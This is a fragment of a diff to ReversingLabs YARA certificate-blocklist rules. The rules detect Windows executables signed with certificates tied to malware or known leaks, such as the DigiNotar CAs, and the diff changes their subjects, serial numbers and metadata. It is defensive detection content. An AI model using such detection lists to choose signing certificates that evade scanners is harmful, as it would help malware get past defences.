+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L657-L673"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a3bd9aaba8dbdb340b5d3013684584524eb08b11339985ba6ca0291b8c8bc692"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9967,21 +34632,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and ( pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" or pe.signatures [ i ] . serial == "ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" ) and 1604620800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "salvatore macchiarella" and pe.signatures [ i ] . serial == "1a:3f:aa:eb:3a:8b:93:b2:39:4f:ec:36:34:59:96:e6" and 1468454400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1A35Acce5B0C77206B1C3Dc2A6A2417C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0bf561ac-0283-557f-a685-4603e2b58273"
+		id = "0e42ffb8-07f2-55e4-977d-7760e923d76d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7690-L7708"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8e0a11efc739baefe23a3d77e4eefc9dc23c74821c91fc219822dbc5dbb468b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L675-L691"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ce161fdd511e0efa042516ead09c6ab5f8dcf54f2087cdccbfed8e7cdfbd25b2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9991,21 +34656,21 @@ rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and ( pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" or pe.signatures [ i ] . serial == "c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" ) and 1604361600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cd ingegneri associati srl" and pe.signatures [ i ] . serial == "1a:35:ac:ce:5b:0c:77:20:6b:1c:3d:c2:a6:a2:41:7c" and 1166054399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Eb40Ea11Eaac847B050De9B59E25Bdc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e3ad8f20-d12f-54e9-a6da-7aad28a10287"
+		id = "e9f94ae9-0158-5789-b4d2-88f750442274"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7710-L7728"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b1d6f27fb513542589a5c9011e501a9d298282bba6882eac0fc7bf3e6ebb291"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L693-L709"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d0e7ab78fb42c9a8f19cba8e6a8b15d584651a23f1088e1f311589d46145e963"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10015,21 +34680,21 @@ rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and ( pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" or pe.signatures [ i ] . serial == "92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" ) and 1605139200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "My Free Internet Update" and pe.signatures [ i ] . serial == "6e:b4:0e:a1:1e:aa:c8:47:b0:50:de:9b:59:e2:5b:dc" and 1062201599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6724340Ddbc7252F7Fb714B812A5C04D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1b8390aa-16b9-558b-aee8-e30fc7100af4"
+		id = "2b61de88-9fea-5c3f-a7ab-db91e90b4965"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7730-L7746"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4ae755e814ae2488d4bd6b8136ab6d78e4809a2ddacb7f88cf1d2b64c1488898"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L711-L727"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bc72c2ca5f81198684233e23260831da5b9ef4e7ac5a25abbdb303eecc38bd53"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10039,21 +34704,21 @@ rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" and 1607040000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YNK JAPAN Inc" and pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" and 1306195199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0813Ee9B7B9D7C46001D6Bc8784Df1Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4f34fd37-908c-573c-ba53-5ab622589e88"
+		id = "0915fae0-ac6f-5a92-ab44-80f840fd5061"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7748-L7764"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4b58c83901605d8b43519f1bc2d4ac8dc10c794f027681378b2bee2a8ff81604"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L729-L745"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1a25a2f25fa8d5075113cbafb73e80e741268d6b2f9e629fd54ffca9e82409b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10063,21 +34728,21 @@ rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" and 1606435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Les Garcons s'habillent" and pe.signatures [ i ] . serial == "08:13:ee:9b:7b:9d:7c:46:00:1d:6b:c8:78:4d:f1:dd" and 1334707199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_530591C61B5E1212F659138B7Cea0A97 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "386c81ef-87aa-514e-81d7-dddfb90e0dc2"
+		id = "71cf0653-5aab-5d5c-aa3a-f42f40196412"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7766-L7784"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "883545593b48aa11c11f7fa1a1f77c62321ea86067f1ed108dcd00c8c6cd3495"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L747-L763"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ef01e542d145475713bbd373bdcdae5f25bfd823a60e7d40fe9a6b6039c83e0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10087,21 +34752,21 @@ rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and ( pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" or pe.signatures [ i ] . serial == "e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" ) and 1604966400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x97\\xA5\\xE7\\x85\\xA7\\xE5\\xB3\\xB0\\xE5\\xB7\\x9D\\xE5\\x9B\\xBD\\xE9\\x99\\x85\\xE7\\x9F\\xBF\\xE4\\xB8\\x9A\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "53:05:91:c6:1b:5e:12:12:f6:59:13:8b:7c:ea:0a:97" and 1403654399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07270Ff9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "c72b8b2a-3e49-5ac3-ab4d-55b86ce7f061"
+		id = "fcd2d82a-b51d-53ff-bfae-3c83147c1903"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7786-L7804"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "03ac299459a1aaf2e4a2e62884cd321e16100fee78b4b0e271acdd8a4e32525c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L765-L781"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8f0da7c330464184fa1d5bf8d51dd8ad2e8637710a36972dcab03629cb57e910"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10111,21 +34776,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kolorit" and ( pe.signatures [ i ] . serial == "00:9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" or pe.signatures [ i ] . serial == "9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" ) and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:0f:f9" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0727100D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "cbc0c6ca-fab2-531e-b368-4d3fdc72509f"
+		id = "1ee866ec-a445-5a79-b824-37f28a49f20b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7806-L7824"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e2044c6ddb80f3add13dfc3b623d0460ce8e9a66c5a98582f80d906edbbbd829"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L783-L799"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a09f4004ed002b90d67a3baddde74832e6c7b70e8b330347ef169460750aa344"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10135,21 +34800,21 @@ rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREVOKAPITAL, s.r.o." and ( pe.signatures [ i ] . serial == "00:a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" or pe.signatures [ i ] . serial == "a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" ) and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:0d" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07271003 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "c2c32499-4b0d-51ad-a10e-1ddd7218df84"
+		id = "7573c436-5bf9-5522-9952-e30dbbccd092"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7826-L7842"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b3a31a54132fd8ca2c11b7806503207a4197f16af78693387bac56879b5e1448"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L801-L817"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "14c201b4fdda5b3553732a173a3d6705129c54f2a50d26997d63a77be8504285"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10159,21 +34824,21 @@ rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:03" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_013134Bf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "7d4033b8-da1d-55f5-aa80-f96636650633"
+		id = "a3292707-c481-56a8-abf9-e1a762c76cb6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7844-L7862"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b965e897b42c39841e663cc144cf6e4a81fc9bcb64ce3a15a7ca021e95866b08"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L819-L835"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1ade100c310c22bce25bcc6687855bd4eb6364b64cf31514b2548509a16e4a36"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10183,21 +34848,21 @@ rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o., Ljubljana" and ( pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" or pe.signatures [ i ] . serial == "92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" ) and 1607040000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Organisatie - G2" and pe.signatures [ i ] . serial == "01:31:34:bf" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01314476 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "75ec52c5-4c59-51d8-bd9b-928c75d3521a"
+		id = "e0a52ad1-cebd-5ffc-953f-e0b09fc6d710"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7864-L7880"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a9ee8534d89b8ac8705bb1777718513a28e4531ed398f482f46a72f2760af161"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L837-L853"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6f2f3f3ae009fbb9ebe589fc6b640be89c4a7b734eda515f182c7e9c9ffb4779"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10207,21 +34872,21 @@ rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" and 1608024974 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid" and pe.signatures [ i ] . serial == "01:31:44:76" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_013169B0 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "92baa26f-1352-53ed-bb9f-0a632e471dd5"
+		id = "a5f68c0a-635a-5aa9-94d2-7628999f06c2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7882-L7900"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b3e6927abfce69548374bfd430a3ae3a1c5a8d05f0f40e43091b4d12025c5b1a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L855-L871"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "354421ebad7fd0b73c9ba63630c91d481901ca9ec39be3c6b66843221e4b5aad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10231,21 +34896,21 @@ rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and ( pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" or pe.signatures [ i ] . serial == "c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" ) and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid en Bedrijven" and pe.signatures [ i ] . serial == "01:31:69:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C76Da9C910C4E2C9Efe15D058933C4C : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d2988928-4ef3-56bf-a407-f735756c7f81"
+		id = "a9b06d49-1ab2-539e-bd1f-16da40b654b2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7902-L7920"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "66a340f169e401705ba229d2d4548cef1a57bf1d2d320b108d12b2049b063b92"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L873-L889"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "883e93bff42161ba68f69fb17f7e78377d7f3cb6b6cdf72cffb4166466f8bc7b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10255,21 +34920,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and ( pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" or pe.signatures [ i ] . serial == "9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" ) and 1605744000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_469C2Caf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "358391b7-649b-5792-b4bd-d97b388c5d12"
+		id = "12d7c4a8-0a84-502a-855b-674972a2e2e1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
